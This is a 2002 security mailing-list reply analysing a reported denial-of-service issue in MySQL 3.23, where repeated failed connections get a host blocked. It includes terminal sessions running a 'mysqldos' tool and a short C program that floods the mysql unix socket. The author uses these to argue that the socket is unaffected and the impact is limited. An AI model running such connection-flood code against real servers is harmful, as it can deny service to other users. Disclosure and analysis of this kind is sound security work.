Re: [luca.ercoli@inwind.it: DoS against mysqld]
From: Simone Piunno (pioppo@ferrara.linux.it)Date: 08/23/02
- Previous message: Scott T. Cameron: "UTStarcom B-NAS 1000 / B-RAS 1000 Major Security Flaw"
- Maybe in reply to: Simone Piunno: "[luca.ercoli@inwind.it: DoS against mysqld]"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 23 Aug 2002 21:18:34 +0200 From: Simone Piunno <pioppo@ferrara.linux.it> To: Andreas Gietl <a.gietl@e-admin.de>
Several people reported that on a typical small shared web server with
mysql on localhost, a single user could DoS other co-hosted users, but
they are wrong because you can always connect mysqld on localhost
via the unix socket (actually this is the default and the better
way... I can't see why someone should prefer TCP).
Proof of concept:
[pioppo@liston pioppo]$ mysql -h 127.0.0.1
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1 to server version: 3.23.47
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> exit
Bye
[pioppo@liston pioppo]$ ./mysqldos -h 127.0.0.1
Sending dos ...............
[pioppo@liston pioppo]$ mysql -h 127.0.0.1
ERROR 1129: Host 'localhost.localdomain' is blocked because of many
connection errors. Unblock with 'mysqladmin flush-hosts'
[pioppo@liston pioppo]$ mysql -h localhost
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 21 to server version: 3.23.47
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
TCP connections from localhost are blocked, but who cares?
Well educated clients don't use TCP to connect to localhost
and the unix socket is not blocked.
Now, can we DoS the unix socket? No
[pioppo@liston pioppo]$ cat mysqlunix.c
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
#define SOCK "/var/lib/mysql/mysql.sock"
int main(int argc, char *argv[]){
int sk;
int i;
int rc;
struct sockaddr_un sun;
sun.sun_family = AF_UNIX;
strcpy(sun.sun_path, SOCK);
printf("Sending dos on the unix socket ");
for (i = 0; i < 15; i++) {
sk = socket(PF_UNIX, SOCK_STREAM, 0);
if (sk < 0) {
perror("socket");
exit(1);
}
rc = connect(sk, (struct sockaddr *)&sun, sizeof(sun));
if (rc < 0) {
perror("connect");
exit(1);
}
printf(".");
close(sk);
}
printf("\n");
return 1;
}
[pioppo@liston pioppo]$ make mysqlunix
cc mysqlunix.c -o mysqlunix
[pioppo@liston pioppo]$ ./mysqlunix
Sending dos on the unix socket ...............
[pioppo@liston pioppo]$ mysql -h localhost
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 56 to server version: 3.23.47
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
I think the only real concern is the one proposed by Andreas Gietl:
> The only Situation this can really DOS a service i can imagine is a
> shared hosting-environment with a central mysql-server on a remote
> box.
agreed, but again I can't see anything wrong in this.
Not blocking the offender would cause thread exaustion very soon,
and this would be a much worse problem: a DoS against ALL clients.
-- Adde parvum parvo magnus acervus erit. Simone Piunno, FerraraLUG - http://members.ferrara.linux.it/pioppo
- application/pgp-signature attachment: stored
- Previous message: Scott T. Cameron: "UTStarcom B-NAS 1000 / B-RAS 1000 Major Security Flaw"
- Maybe in reply to: Simone Piunno: "[luca.ercoli@inwind.it: DoS against mysqld]"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
